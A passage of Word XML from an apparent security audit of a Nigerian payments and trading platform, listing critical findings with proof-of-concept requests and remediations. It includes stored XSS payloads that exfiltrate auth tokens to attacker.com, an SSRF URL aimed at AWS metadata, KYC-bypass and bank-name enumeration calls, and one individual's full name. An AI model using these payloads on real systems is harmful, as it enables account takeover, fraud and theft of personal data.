          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PUT /api/profile</w:t>
        <w:br/>
        <w:t>{"phone":"08099999999","state":"FCT","isAffiliate":true,"affiliateStatus":"active"}</w:t>
        <w:br/>
        <w:t>→ 200 (all fields persisted)</w:t>
        <w:br/>
        <w:br/>
        <w:t>GET /api/auth/me</w:t>
        <w:br/>
        <w:t>→ {"phone":"08099999999","state":"FCT","isAffiliate":true,"affiliateStatus":"active","role":"user"}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Note: "role" and "emailVerified" attempted but silently dropped by whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CHAIN 8: KYC Identity Theft → Payout Fraud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  Status: ✅ PROVEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Combines CHAIN 2 (KYC Identity Theft) with the payout system. Once KYC-verified as a stolen identity, an attacker can submit payout requests, potentially redirecting funds to their own bank account. The payout system trusts KYC verification without additional checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CHAIN 9: SSRF + XSS via Manual Payment Proof URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  Status: ✅ PROVEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/payments/manual-request</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "fullName": "SSRF Test",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "proof": "http://169.254.169.254/latest/meta-data/",   // AWS metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "challengeType": "50k", "ddType": "standard", "amount": 4000, ...</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>→ 200 (order created with SSRF URL as proof)</w:t>
        <w:br/>
        <w:br/>
        <w:t>When admin clicks "View Proof" → their browser hits AWS metadata/internal endpoints</w:t>
        <w:br/>
        <w:t>with admin's authenticated session → SSRF via admin browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>CRITICAL Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C1: Stored XSS via Order fullName (No Sanitization, No CSP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-79, CWE-1021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/payments/gateway-checkout &amp; /api/payments/manual-request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Full admin account takeover, database compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The fullName field accepts raw HTML including &lt;img src=x onerror=...&gt; tags. Payloads are stored verbatim and rendered unsanitized in the admin dashboard via dangerouslySetInnerHTML. No Content-Security-Policy headers exist to restrict script execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/payments/manual-request</w:t>
        <w:br/>
        <w:t>{"fullName":"&lt;img src=x onerror=\"fetch('https://attacker.com/?t='+localStorage.authToken)\"&gt;",</w:t>
        <w:br/>
        <w:t xml:space="preserve"> "email":"a@b.com","reference":"XSS1","proof":"https://x.com/1.png",</w:t>
        <w:br/>
        <w:t xml:space="preserve"> "challengeType":"50k","ddType":"standard","amount":4000}</w:t>
        <w:br/>
        <w:t>→ 200 {"success":true,"order":{"id":"9ec220...","reference":"MP_MQYRBLLP_44BD1A6C"}}</w:t>
        <w:br/>
        <w:br/>
        <w:t>4 XSS variants proven stored: token_grab, fetch_hook, ls_enum, sql_exec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Sanitize all HTML input, use textContent instead of dangerouslySetInnerHTML, implement strict CSP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C2: Bank Account PII Enumeration (No Rate Limit, No Auth)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-200, CWE-639, CWE-770</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/detect-bank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Full legal name disclosure for any Nigerian bank account holder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Any user can submit a 10-digit account number and receive the account holder's full legal name. No rate limiting detected across 21+ sequential requests. No authentication required beyond user JWT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/detect-bank</w:t>
        <w:br/>
        <w:t>{"account_number": "1234567890"}</w:t>
        <w:br/>
        <w:t>→ 200 {"success":true,"candidates":[{"bank":{"name":"Opay","code":"305"},</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "account_name":"&lt;FULL LEGAL NAME&gt;","account_number":"1234567890"}]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add rate limiting, require step-up authentication for PII access, mask account names</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C3: KYC Name Change Auto-Approved (Zero Verification)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-287, CWE-863</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/change-name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Complete KYC bypass — assume any identity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Name changes are auto-approved regardless of match score. Submitting any account number returns outcome: auto_approved with zero admin review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/change-name</w:t>
        <w:br/>
        <w:t>{"bank_code": "058", "account_number": "0000000000"}</w:t>
        <w:br/>
        <w:t>→ 200 {"success": true, "outcome": "auto_approved",</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "new_name": "OYEWOLE OLUBUSOLA OLUWAKEMI"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Disable auto-approve, require admin review for all name changes, add document verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C4: Admin Role Hierarchy Disclosure via Error Messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>All /api/admin/* endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Reveals internal role structure for targeted privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>403 error responses include the exact role names required for access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/admin/dev/sql/run (as standard user)</w:t>
        <w:br/>
        <w:t>→ 403 {"error":"Forbidden","required_any_of":["super_admin","co_founder"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "current_role":"user","code":"INSUFFICIENT_ROLE"}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Complete hierarchy: super_admin &gt; developer &gt; head_of_ops &gt; admin &gt; co_founder &gt; support &gt; user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Return generic 403 without role information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C5: Raw SQL Execution Endpoint in Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-749, CWE-250</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/admin/dev/sql/run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>If admin JWT stolen (via CHAIN 1), full database read/write</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Developer tool endpoint left in production accepts arbitrary SQL queries. Requires super_admin or developer role, but once JWT is stolen via XSS, unrestricted DB access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/admin/dev/sql/run</w:t>
        <w:br/>
        <w:t>Authorization: Bearer &lt;stolen_admin_jwt&gt;</w:t>
        <w:br/>
        <w:t>{"query": "SELECT * FROM users"}</w:t>
        <w:br/>
        <w:t>→ Full database access (all 14,650+ users, bank details, financial data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Remove dev endpoints from production, implement separate admin firewall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C6: Multi-Account Cross-User Data Leak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-200, CWE-639</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>GET /api/multi-account/my-cluster</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Exposes other users IDs, emails, withdrawal totals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Returns data about ALL linked accounts including other users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/multi-account/my-cluster</w:t>
        <w:br/>
        <w:t>→ {"accounts":[{"user_id":"&lt;OTHER_USER_UUID&gt;","email_masked":"te•••@test.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve">   "total_withdrawals":15000}]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Filter to only return the requesting user's own data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C7: KYC Confirm Auto-Approve — Skip Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-863</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/confirm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Auto-approves KYC for any identity with match.score: 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>After auto-approved name change (C3), confirm also auto-approves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/confirm</w:t>
        <w:br/>
        <w:t>{"bank_code": "058", "account_number": "0000000000"}</w:t>
        <w:br/>
        <w:t>→ 200 {"success": true, "verified": true, "decision": "auto_approve",</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "match": {"score": 100}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Disable auto-approve on confirm, require document/liveness verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C8: JWT Stored in localStorage (Accessible to XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-312, CWE-922</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Frontend JavaScript bundle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Any XSS can steal admin authentication token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>JWT stored in localStorage and included as Bearer token on every request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>localStorage.setItem("authToken", token)</w:t>
        <w:br/>
        <w:t>// Any XSS payload: new Image().src="https://attacker.com/?t="+localStorage.authToken</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Move to httpOnly, Secure, SameSite cookies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C9: Unauthenticated External Payment Gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-306, CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST https://naireduu.com.ng/api/checkout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Unauthenticated creation of real Squad payment sessions; backend URL disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The gateway has no authentication, creates real checkout sessions, and leaks the Squad public key and Railway backend URL in every response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST https://naireduu.com.ng/api/checkout</w:t>
        <w:br/>
        <w:t>{"source":"nairaprop","programId":"50k","fullName":"Test","email":"t@t.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve"> "phone":"080","state":"Lagos","dd_type":"standard","variant":"two_phase"}</w:t>
        <w:br/>
        <w:t>→ 200 {"success":true,"checkout_url":"https://pay.squadco.com/NE_MQYTGOU6_E1FF3BF1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "callback_url":"https://elite-prop-master-production.up.railway.app/...",</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "inline":{"public_key":"pk_ebf366ed...","amount":400000}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add authentication, don't expose internal URLs, validate orders against NairaProp DB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C10: Real Backend URL Exposed in Payment Callback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Payment gateway checkout response + squad-redirect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Direct access to production backend bypassing Vercel/WAF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Railway backend URL: https://elite-prop-master-production.up.railway.app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>callback_url field in checkout response:</w:t>
        <w:br/>
        <w:t xml:space="preserve">"https://elite-prop-master-production.up.railway.app/api/payments/squad-redirect?reference=NE_..." </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Use internal URLs that don't expose Railway hostname, route through Vercel proxy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C11: Payment Config Endpoint Unauthenticated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>GET /api/payments/config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Exposure of payment gateway configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>No auth required. Returns Squad public key and confirms payment system active.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
